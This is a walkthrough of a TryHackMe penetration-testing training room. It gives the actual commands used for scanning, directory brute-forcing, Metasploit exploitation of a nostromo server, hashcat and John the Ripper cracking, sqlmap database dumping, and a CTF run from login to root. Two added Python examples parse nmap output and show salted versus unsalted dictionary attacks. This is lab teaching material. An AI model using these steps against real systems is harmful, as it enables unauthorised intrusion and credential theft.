CC:PenTesting TryHackMe

Ian Peter
10 min read · Feb 14, 2022


This is an article to provide assistance to the CC:Pentesting TryHackMe room.

Prerequisites:

  • Access to Internet and a TryHackMe account
  • Access the room found here:

Part 1: Introduction

  • This section is mainly notes and introduces you to the basic skills you will need to get through this room.
  • After you have finished reading, click on the green button; your screen should then look like the screenshot below
Completing Introduction section

[Section 1 — Network Utilities] — nmap

  • This task requires you to explore the nmap man page and extract the answers to the questions from it. You can either use the command line by typing in

man nmap

or alternatively you could use the following website:

  • After answering all the relevant questions, you can then deploy the machine and begin practically scanning the machine.
  • You can run a comprehensive scan using the following command:

nmap -sC -sV <ip address>

  • Replace <ip address> with the machine’s IP. You should then be able to answer the subsequent questions
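The output of nmap -sC -sV is meant to be read by a person, but on a larger engagement you will want the port table in a structured form so you can triage it. The following is an added example, not part of the original article: a small parser for the port lines of nmap’s normal output. The scan text it parses is constructed for the demo and is not a real scan of any host.

```python
import re

# Constructed sample of `nmap -sC -sV` normal output (not a real scan of any host).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.1.1
Host is up (0.034s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77:88:99 (RSA)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
445/tcp  filtered microsoft-ds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line looks like: "<port>/<proto>  <state>  <service>  [<version banner>]".
# Script output lines start with "|" and are skipped by this pattern.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_nmap_ports(output):
    """Return one dict per port line: port, proto, state, service, version."""
    results = []
    for line in output.splitlines():
        match = PORT_LINE.match(line.rstrip())
        if not match:
            continue
        entry = match.groupdict()
        entry["port"] = int(entry["port"])
        # Ports without a version banner (filtered ports, unknown services) get an empty string.
        entry["version"] = (entry["version"] or "").strip()
        results.append(entry)
    return results


def open_services(output):
    """(port, service, version) for every port nmap reports as open."""
    return [
        (p["port"], p["service"], p["version"])
        for p in parse_nmap_ports(output)
        if p["state"] == "open"
    ]


if __name__ == "__main__":
    for port, service, version in open_services(SAMPLE_NMAP_OUTPUT):
        print(f"{port:>5}  {service:<12} {version}")
```

For real engagements nmap’s -oX (XML) output is the more robust thing to parse; this example deliberately works on the human-readable form the article shows, since that is what you see in the terminal.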

[Section 1 — Network Utilities] — Netcat

  • Note that netcat is a very powerful tool; it also makes it easy to set up a reverse shell, which comes in handy on many pentesting engagements
  • This section requires reading through the netcat man page, which can be accessed from the command line using

man nc

or alternatively, from the following website:

[Section 2 — Web Enumeration] — gobuster

  • Gobuster is a very powerful tool for website enumeration and will come in handy in the following sections as well
  • This section requires reading through the gobuster man page, which can be accessed from the command line using

man gobuster

or alternatively, from the following websites:

  • After this, you can deploy the machine and run gobuster on the website using the following command:

gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x xxa

  • Alternatively, you can execute the command without the -x xxa section so as to just find the hidden directory as seen below

gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

  • Replace the <IP ADDRESS> with the machine’s IP. You should be able to answer the subsequent questions

[Section 2 — Web Enumeration] — nikto

  • This section requires reading through the nikto man page, which can be accessed from the command line using

man nikto

or alternatively, from the following website:

[Section 3 — Metasploit]: Intro

  • Metasploit is one of the most powerful tools for exploiting a system’s vulnerabilities, and being familiar with it is a necessity
  • For this section, just read through and select the green button
Completing Introduction section

[Section 3 — Metasploit]: Setting Up

  • On a Kali machine, Metasploit comes preinstalled. If not, follow the instructions provided in this room to install Metasploit, or alternatively follow the instructions in this article:

You can then run the msfconsole command to launch Metasploit. It can take up to a few minutes to launch depending on your PC’s capabilities

Metasploit console
  • After launching, a prompt similar to the one above should appear where you can execute the help command to answer the subsequent questions

[Section 3 — Metasploit]: Selecting a module

  • For this section, you can begin by using the search command to find the eternal blue module

search eternal blue

Searching and using eternal blue exploit
  • You can then use the use command to select the eternal blue exploit using either of the following commands:

use 0

use exploit/windows/smb/ms17_010_eternalblue

  • The subsequent questions can be answered using the options command. It will provide a hint to answer some of the questions
  • The remaining questions may require a bit of research to answer. I made use of the following resources:

[Section 3 — Metasploit]: meterpreter

  • This section can be answered by researching the meterpreter commands that can be executed. A helpful site for this might be:

[Section 3 — Metasploit]: Final Walkthrough

  • This section involves using Metasploit to exploit a vulnerable machine. You can use all the skills learnt in previous Metasploit sections
  • The steps to exploit the machine are:

Search for the nostromo_code_exec exploit using search command

Use the exploit

Set the RHOST as the provided machine IP e.g. set RHOST 10.10.1.1

Set the LHOST as your own IP. You can find it with ip addr show. Note that if you are connected through OpenVPN, use the tun0 IP.

After all this, you are greeted with a basic shell that can only run a limited number of commands.

You can then cd to the directory provided and cat the contents of the file contained within the secret directory.

cd /var/nostromo/htdocs

ls

cd <secret directory>

ls

cat <file>

[Section 4 — Hash Cracking]: Intro

  • This section introduces hash cracking which can be a very important concept to understand and manipulate during a pentest
  • You can just read through the information provided and select the green button provided
Completing the Hashing introduction section

[Section 4 — Hash Cracking]: Salting and Formatting

  • This section introduces salting, which is likewise a security feature used to slow down the cracking of hashes. It is very relevant considering the LinkedIn hack of 2012, where the passwords were not salted
  • You can just read through the information provided and select the green button provided
Completing the Salting and Hashing section

[Section 4 — Hash Cracking]: hashcat

  • This section requires reading through the hashcat man page, which can be accessed from the command line using

man hashcat

or alternatively, from the following websites:

  • A hash is also provided in this section which can be cracked by copying it into a file with any name and using the command

hashcat -m 17600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

where :

-m 17600 represents the type of hash being cracked (SHA3-512)

-a 0 represents that it is a dictionary attack

-o points to the output file for the cracked password

hash.txt is the name of the file storing the provided hash.

/usr/share/wordlists/rockyou.txt is the wordlist we will be using to crack the hash.

  • The same command can be executed to crack the remaining hashes while only replacing the -m 17600 part with the mode number for the hash being cracked.
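To tie the Salting and Formatting section to this one: the reason a dictionary attack such as hashcat -a 0 is so effective against unsalted hashes is that the hashes of a whole wordlist can be computed once and reused against every hash ever captured, whereas a per-user salt forces that work to be repeated for each stored hash. The following is an added example, not part of the original article, hashcat or John the Ripper. It uses Python’s hashlib SHA3-512 (the same algorithm as hashcat mode 17600) and a constructed five-word wordlist standing in for rockyou.txt; the salt$hash storage format is an assumption made for the demo.

```python
import hashlib
import hmac
import os

# Constructed demo wordlist standing in for rockyou.txt; none of these come from the room.
WORDLIST = ["123456", "password", "letmein", "qwerty", "sunshine"]


def sha3_512_hex(data: bytes) -> str:
    # Same algorithm as hashcat mode 17600 (SHA3-512), hex-encoded as hashcat expects it.
    return hashlib.sha3_512(data).hexdigest()


def build_lookup_table(words):
    """Precompute hash -> password for the whole wordlist ONCE.

    Against unsalted hashes this table is reusable forever and against any
    number of victims; that reuse is exactly what salting destroys.
    """
    return {sha3_512_hex(w.encode()): w for w in words}


def lookup_unsalted(hash_hex, table):
    """Crack an unsalted hash with a single dictionary lookup (no hashing at all)."""
    return table.get(hash_hex)


def hash_with_salt(password: str, salt: bytes) -> str:
    # salt || password, the formatting variant discussed in the room's salting section.
    return sha3_512_hex(salt + password.encode())


def store_password(password: str) -> str:
    """Store as '<salt hex>$<hash hex>' (assumed format). A fresh random salt per user."""
    salt = os.urandom(16)
    return salt.hex() + "$" + hash_with_salt(password, salt)


def verify_password(stored: str, candidate: str) -> bool:
    salt_hex, digest = stored.split("$", 1)
    computed = hash_with_salt(candidate, bytes.fromhex(salt_hex))
    # Constant-time comparison so verification does not leak how many bytes matched.
    return hmac.compare_digest(computed, digest)


def dictionary_attack_salted(stored: str, words):
    """With a salt, the precomputed table is useless: every candidate must be
    rehashed with THIS record's salt, so the cost is (words x stored hashes)
    instead of (words) once."""
    for w in words:
        if verify_password(stored, w):
            return w
    return None


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted:", lookup_unsalted(sha3_512_hex(b"letmein"), table))
    record = store_password("letmein")
    print("salted record:", record)
    print("table lookup on salted hash:", lookup_unsalted(record.split("$", 1)[1], table))
    print("per-record dictionary attack:", dictionary_attack_salted(record, WORDLIST))
```

The takeaway for anyone storing passwords: the salt does not make a weak password strong (the per-record attack still finds "letmein" in five tries), it only removes the attacker’s ability to amortise the work across users; a slow, memory-hard password hash on top of the salt is what makes each of those tries expensive.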

[Section 4 — Hash Cracking]: John The Ripper

  • This section introduces an alternative password cracking tool.
  • This section requires reading through the John the Ripper man page, which can be accessed from the command line using

man john

or alternatively, from the following websites:

  • To crack the hashes provided for this section, we can put the hashes in a single file under any name and run the commands:

john --wordlist=rockyou.txt hashes.txt

john --show hashes.txt

where:

--wordlist represents the wordlist to be used

hashes.txt represents the file storing the hashes

--show is used to show the final values of the cracked passwords

  • Note that the hashes can also be cracked using online sites in case your machine is unable to. The following sites can be used:

[Section 5 — SQL Injection]: Intro

  • This section involves an introduction to SQL injection which can be useful if you want to be a bug bounty hunter but also just for a general pentest.
  • Read through the material and select the green button at the end of the section
Completing the SQL injection Introduction

[Section 5 — SQL Injection]: sqlmap

  • This section requires reading through the sqlmap man page, which can be accessed from the command line using

man sqlmap

or alternatively, from the following websites:

[Section 5 — SQL Injection]: A Note on Manual SQL Injection

  • This notes a very important point: do not be overdependent on tools without knowing how to carry out the exploit manually. A useful resource detailing manual SQL exploits is provided.

[Section 5 — SQL Injection]: Vulnerable Web Application

  • This section involves using the sqlmap to exploit the web machine that you can deploy.
  • You can begin by executing the following command replacing <IP ADDRESS> with your machine’s IP. The resulting information should help you find out how many types of sqli have been discovered.

sqlmap -u http://<IP ADDRESS> --forms

  • You can then dump the database using the following command, replacing <IP ADDRESS> with your machine’s IP

sqlmap -u http://<IP ADDRESS> --forms --dump

  • From the dump, you can scroll down to find the name of the databases and information about the tables as well.

[Section 6 — Samba]: Intro

  • This section introduces Samba, which is a service common on Windows machines.
  • Read through the material and select the green button at the end of the section
Completing the Samba Intro section

[Section 6 — Samba]: smbmap

  • This section requires reading through the smbmap man page, which can be accessed from the command line using

man smbmap

or alternatively, from the following websites:

[Section 6 — Samba]: smbclient

  • This section extends the Samba material with smbclient, which differs from smbmap by offering you an interactive prompt. It might require installation, which can be done through:

apt install smbclient

  • This section requires reading through the smbclient man page, which can be accessed from the command line using

man smbclient

or alternatively, from the following websites:

[Section 6 — Samba]: A note about impacket

  • This section talks about impacket, which is a collection of Windows scripts. It also mentions that it contains scripts that use Samba to enumerate and possibly gain shell access to Windows machines. A link is provided to these scripts:

The room can be completed by selecting the green button at the bottom

Completing the impacket section

[Miscellaneous]: A note on privilege escalation

  • This section provides notes on privilege escalation and various resources you can use.
  • After going through the content, you can complete the room by selecting the green button at the bottom of the page
Completing the section on a note about privilege escalation

[Section 7 — Final Exam]: Good Luck :D

  • This section involves a mini-CTF challenge.

i) You can begin by launching the machine then scanning the ports to find open ports and services running. You can use the command

nmap -sC -sV <IP Address>

ii) Remember to replace <IP Address> with your machine’s IP Address.

iii) After that, you can then use gobuster to enumerate any hidden directories. You can run the command below

gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

iv) You will discover a hidden directory, which you can then enumerate further with gobuster by running the following command:

gobuster dir -u http://<IP ADDRESS>/<hidden-dir> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

v) Replace <hidden-dir> with the name of the hidden directory you found in iv)

vi) From here, you can find the credentials you can use to access the machine. You will be provided with a username and a hashed password

vii) You can crack the password hash using either an online page or local tools such as hashcat or John the Ripper.

viii) Finally, use the credentials to log in to the machine and navigate to the home directory to find the user.txt file. You can use the commands

cd ~/

ls

cat user.txt

ix) From here, elevate your privileges to super user. Lucky for us, no password was required. Navigate to the root user’s directory to find the root.txt flag. You can use the following commands

sudo su

cd ~/

ls

cat root.txt

Conclusion

  • Congratulations on now completing the CC:Pen Testing room on TryHackMe.
  • You can choose to continue your exploration of Pentesting through the provided resources on the page or explore a different TryHackMe room.
